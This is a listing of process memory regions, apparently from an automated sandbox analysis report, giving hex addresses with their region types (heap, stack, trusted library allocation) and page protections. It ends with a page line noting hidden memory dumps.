page read and write
FA99FFF000
stack
page read and write
2293619C000
heap
page read and write
22936185000
heap
page read and write
22936185000
heap
page read and write
22936238000
heap
page read and write
21090073000
trusted library allocation
page read and write
22936217000
heap
page read and write
7FF848D86000
trusted library allocation
page read and write
22936762000
heap
page read and write
7FF848CF0000
trusted library allocation
page read and write
229366C3000
heap
page read and write
22936314000
heap
page read and write
210ECBE5000
heap
page read and write
229366C7000
heap
page read and write
E5B723E000
stack
page read and write
22936238000
heap
page read and write
22936185000
heap
page read and write
229366EF000
heap
page read and write
229366A0000
heap
page read and write
2B501706000
trusted library allocation
page read and write
2B57DB7A000
heap
page read and write
22934809000
heap
page read and write
7FF848CEB000
trusted library allocation
page read and write
21080412000
trusted library allocation
page read and write
2B57DBE0000
heap
page read and write
E5B6C7D000
stack
page read and write
2108010E000
trusted library allocation
page read and write
229366E7000
heap
page read and write
229366F1000
heap
page read and write
2293617E000
heap
page read and write
229366DD000
heap
page read and write
2293615F000
heap
page read and write
7FF848EA0000
trusted library allocation
page execute and read and write
22936185000
heap
page read and write
FA9A3FE000
stack
page read and write
2293617A000
heap
page read and write
229361D2000
heap
page read and write
229361A8000
heap
page read and write
2293618C000
heap
page read and write
E5B71B8000
stack
page read and write
229366E0000
heap
page read and write
7FF848CD0000
trusted library allocation
page read and write
2B510010000
trusted library allocation
page read and write
7FF848FB0000
trusted library allocation
page read and write
2B57BDE0000
heap
page readonly
22936241000
heap
page read and write
210EED70000
heap
page read and write
22936960000
heap
page read and write
22936237000
heap
page read and write
2293622E000
heap
page read and write
7FF848ED0000
trusted library allocation
page execute and read and write
22934824000
heap
page read and write
229361C4000
heap
page read and write
229366BB000
heap
page read and write
E5B703F000
stack
page read and write
22934813000
heap
page read and write
229361C7000
heap
page read and write
2293621E000
heap
page read and write
3745C7E000
stack
page read and write
229361D2000
heap
page read and write
229366F5000
heap
page read and write
FA9A0FE000
stack
page read and write
2293667F000
heap
page read and write
7FF848CE0000
trusted library allocation
page read and write
229366EA000
heap
page read and write
3745E7E000
stack
page read and write
2293481B000
heap
page read and write
22936732000
heap
page read and write
21080001000
trusted library allocation
page read and write
229361D2000
heap
page read and write
2B57BA9F000
heap
page read and write
7FF848CF0000
trusted library allocation
page read and write
229366D8000
heap
page read and write
229366D9000
heap
page read and write
2B57DB30000
heap
page read and write
7FF848DC6000
trusted library allocation
page execute and read and write
2B57D470000
heap
page read and write
22936241000
heap
page read and write
22936761000
heap
page read and write
229361AE000
heap
page read and write
2B5016F2000
trusted library allocation
page read and write
2B57DCC0000
heap
page read and write
229361C4000
heap
page read and write
229366F5000
heap
page read and write
229366F2000
heap
page read and write
22936772000
heap
page read and write
7FF849010000
trusted library allocation
page read and write
229366A5000
heap
page read and write
22936217000
heap
page read and write
229366A8000
heap
page read and write
7FF848FE0000
trusted library allocation
page read and write
2B5016ED000
trusted library allocation
page read and write
229366B6000
heap
page read and write
2B510073000
trusted library allocation
page read and write
7FF849030000
trusted library allocation
page read and write
2293615D000
heap
page read and write
22936237000
heap
page read and write
3745883000
stack
page read and write
2293672D000
heap
page read and write
229366FD000
heap
page read and write
2293669F000
heap
page read and write
229366B6000
heap
page read and write
2293618C000
heap
page read and write
2293677D000
heap
page read and write
7FF848D90000
trusted library allocation
page read and write
22936168000
heap
page read and write
2B57D960000
heap
page read and write
229366BD000
heap
page read and write
7FF848E94000
trusted library allocation
page read and write
229366EF000
heap
page read and write
210EED60000
heap
page execute and read and write
22936191000
heap
page read and write
2B57BDF0000
trusted library allocation
page read and write
229366DD000
heap
page read and write
374617E000
stack
page read and write
22934747000
heap
page read and write
22936709000
heap
page read and write
2B500001000
trusted library allocation
page read and write
2293476F000
heap
page read and write
21080424000
trusted library allocation
page read and write
7FF848F20000
trusted library allocation
page read and write
22936185000
heap
page read and write
229366F1000
heap
page read and write
22936789000
heap
page read and write
E5B70B7000
stack
page read and write
2108001D000
trusted library allocation
page read and write
229366B0000
heap
page read and write
7FF848E80000
trusted library allocation
page read and write
210EECA9000
heap
page read and write
229366C2000
heap
page read and write
22936217000
heap
page read and write
22936772000
heap
page read and write
2293678B000
heap
page read and write
229361C7000
heap
page read and write
7FF848CE3000
trusted library allocation
page execute and read and write
2109004B000
trusted library allocation
page read and write
7FF848F60000
trusted library allocation
page read and write
22936703000
heap
page read and write
22936725000
heap
page read and write
2293617A000
heap
page read and write
229361CD000
heap
page read and write
229366B2000
heap
page read and write
210EEC41000
heap
page read and write
229366B2000
heap
page read and write
2293617A000
heap
page read and write
21080122000
trusted library allocation
page read and write
FA99DFE000
stack
page read and write
21080133000
trusted library allocation
page read and write
22936310000
heap
page read and write
229361CA000
heap
page read and write
2293623E000
heap
page read and write
7FF848E90000
trusted library allocation
page execute and read and write
229366B5000
heap
page read and write
210EEAC0000
heap
page execute and read and write
2293678B000
heap
page read and write
210ECD20000
trusted library allocation
page read and write
2293623B000
heap
page read and write
2B57E040000
heap
page read and write
229366FD000
heap
page read and write
22936233000
heap
page read and write
210ECB60000
heap
page read and write
7FF848F10000
trusted library allocation
page read and write
22936710000
heap
page read and write
229366F2000
heap
page read and write
7FF848FD0000
trusted library allocation
page read and write
22936703000
heap
page read and write
2293622E000
heap
page read and write
2293615D000
heap
page read and write
22936238000
heap
page read and write
229366E6000
heap
page read and write
2B57DAC0000
heap
page read and write
2B57DCCA000
heap
page read and write
22936718000
heap
page read and write
2293621E000
heap
page read and write
22936785000
heap
page read and write
E5B6D7E000
stack
page read and write
7FF848F80000
trusted library allocation
page read and write
22934819000
heap
page read and write
22936175000
heap
page read and write
229366D9000
heap
page read and write
2293622E000
heap
page read and write
22934979000
heap
page read and write
229366BE000
heap
page read and write
2293617A000
heap
page read and write
210803D6000
trusted library allocation
page read and write
210ECC17000
heap
page read and write
3745F77000
stack
page read and write
229361A9000
heap
page read and write
229361D1000
heap
page read and write
210801F2000
trusted library allocation
page read and write
22936761000
heap
page read and write
229366A5000
heap
page read and write
7FF848CD4000
trusted library allocation
page read and write
FA99CFE000
stack
page read and write
229361D0000
heap
page read and write
E5B6F7E000
stack
page read and write
210EE695000
heap
page read and write
2B57D474000
heap
page read and write
2B57DBAA000
heap
page read and write
229366A9000
heap
page read and write
229366F2000
heap
page read and write
229366E3000
heap
page read and write
210EED90000
heap
page read and write
2B57DAC7000
heap
page read and write
FA99965000
stack
page read and write
229366F2000
heap
page read and write
7FF848F80000
trusted library allocation
page read and write
229347AF000
heap
page read and write
22936660000
heap
page read and write
229366B6000
heap
page read and write
2293671C000
heap
page read and write
22936180000
heap
page read and write
22936782000
heap
page read and write
2293616B000
heap
page read and write
229361AB000
heap
page read and write
210EECD9000
heap
page read and write
229361BD000
heap
page read and write
7FF848FD0000
trusted library allocation
page read and write
229366C4000
heap
page read and write
229366E5000
heap
page read and write
2B510001000
trusted library allocation
page read and write
229366BF000
heap
page read and write
22936237000
heap
page read and write
229366D8000
heap
page read and write
7FF848E9A000
trusted library allocation
page read and write
22936700000
heap
page read and write
22936163000
heap
page read and write
22936150000
heap
page read and write
229361D0000
heap
page read and write
22936185000
heap
page read and write
229366A8000
heap
page read and write
210EE690000
heap
page read and write
22936191000
heap
page read and write
229361D2000
heap
page read and write
21090001000
trusted library allocation
page read and write
229366F3000
heap
page read and write
2293619C000
heap
page read and write
7FF848CD2000
trusted library allocation
page read and write
22936231000
heap
page read and write
22936170000
heap
page read and write
7FF848F20000
trusted library allocation
page read and write
There are 766 hidden memdumps, click here to show them.